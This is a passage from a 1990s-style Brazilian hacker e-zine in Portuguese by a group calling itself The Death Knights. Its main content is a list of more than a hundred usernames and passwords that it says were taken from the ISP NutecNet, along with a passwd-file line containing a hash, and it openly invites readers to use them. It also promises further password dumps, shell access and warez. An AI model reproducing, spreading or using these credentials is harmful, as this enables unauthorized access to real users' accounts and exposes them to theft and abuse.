bnbcenop:10Dh2R4Cih.X.:577:118:Cenop - BNB / PaqTc-Pb:/u/bnbcenop:/bin/ksh

-------xX !!! CuT HeRe !!! !!! CuT HeRe !!! !!! CuT HeRe !!! Xx-------

.-----------.
| BONUS [2]  \_______________________________________________________________
`----------------------------------------------------------------------------'
                                 by Cacaio

        Bem.. aqui estao algumas senhas da NutecNet que e para voces
usarem! Se a sua senha esta aqui nao venha reclamar! Quem mandou escolher um
provedor com a seguranca tao fraca ou usar uma senha tao facil???
        Se e voce e um destes usuarios, mude sua senha e nao reclame.

        Se divirtam!

        Login           Password

        ------------------------

        betore4         windsurf
        siger           461141
        tealrs          proativa
        bbpoa           bbpoa
        mats            5001
        verao1          verao
        clauelis        julia1
        bacher          h6b9a2y2
        agnelo          nelo18
        rositaju        25061114
        fontoura        0873
        lpackter        3850
        betore4         windsurf
        siger           461141
        poade03d        x5j3f3k3
        poabd1bd        n7o9m0u2
        cyberbod        warlock
        tealrs          proativa
        clauelis        julia1
        bacher          h6b9a2y2
        poain13b        e2i5z4x6
        ghesaito        c1v5n9c0
        conturse        conturse
        raun            rvs4426
        patibga         jacare
        fgdias          dias
        ljung           tippy
        heas            3336
        majusq          646889
        shoerepe        1857
        magalhae        b8v3y6c0
        karenina        p2gp73
        tabbal          1A7A5T3R
        mff             25061962
        memuller        miami5
        depar           a7b2a2e6
        spjn            488
        fabi            351980
        allure          q8e3k7z2
        rfurtado        rcf19738
        valenca         prsv0406
        bremen          09051951
        borsa           03040630
        vrnutec         nutecvr
        telsul          w5e3f2s4
        hacors          g8k7f5l5
        ativa           gillui
        rpl             301060
        lanfredi        transtra
        nieder          xp7199
        floraops        010255os
        valduga         x3j2d1t3
        mslobo          329329
        tnepp           triunfo
        reali           v1z6p0l3
        jocefer         3828
        emporio         andrerie
        avila           t8v0f1x3
        arka            uru66enc
        sprenger        cris3
        cgkltda         kirstcgk
        eob             eob
        rake            nmr2514
        kasper          omega
        baldi           rapida
        jmbr            187
        skp             rosse
        chagdud         chag0210
        rtbrum          7142
        isoppo          c5j8d0r5
        bkrug           212226
        park            051151
        cezimbra        05111978
        runfar          5d63s5
        sieburge        leandro8
        damuller        daniel
        rosacat         k9w3i6s2
        jochini         120552
        vmb             b6k2c0j3
        pierrehb        horta
        cezinha         p9n9f7f6
        lil             m9r0v0m3
        mfischer        e7v7s5d6
        perlail         200382
        aptjr           q8j7s4f5
        rat             21418
        agk             agk47023
        filial05        fil05
        gugadrn         s3x2g6x9
        figo            240665
        stefanel        marcelo
        plenar          1313
        felice          marroc
        ferla           ferrari
        kassimar        markass
        benhardt        mtb
        rogerven        060190
        filial20        fil20
        comerlat        320427
        curvelo         kimber
        jlve            fepathi
        jasc            jandre19
        mcservi         sg10
        dannes          annes
        prluz           t8d3b9z3

        ------------------------

        Por enquanto foram so cento e poucas senhas...
        No proximo numero, varias senhas da Mandic para voces, e talves de
outros lugares! Quem sabe ate de shell... Fique ligado e ate o proximo zine!

.-----------.
| FEW WORDS  \_______________________________________________________________
`----------------------------------------------------------------------------'
                                 by Cacaio

        Quer saber quem sao os nossos membros? De uma olhada em nossa page!
                                               http://www.deatknights.com

        Prez/founder: Cacaio
        Vice Prezidents: pIst0ls e ReNeGaDe

        Se voce quiser se tornar um membro, esqueca, ja temos muitos
        membros.

        No proximo zine, voce sabera como acessar nosso FTP cheinho de utils
        e warez!

        AVISO NOVAMENTE:

        O grupo The Death Knights nao visa nenhum fim lucrativo. Qualquer uso
        das informacoes contidas aqui nao e de nossa responsabilidade. Se voce
        fizer algo descrito e se der mal, problema seu. Nos ensinamos, mas nao
        pedimos para usarem o conhecimento adquirido com este zine.

        Ate o proximo zine!

 ______________________________Death_Knights_________________________________
 ----------------------------------------------------------------------------

                            Criticas? Sugestoes?

                           death@deathknights.com
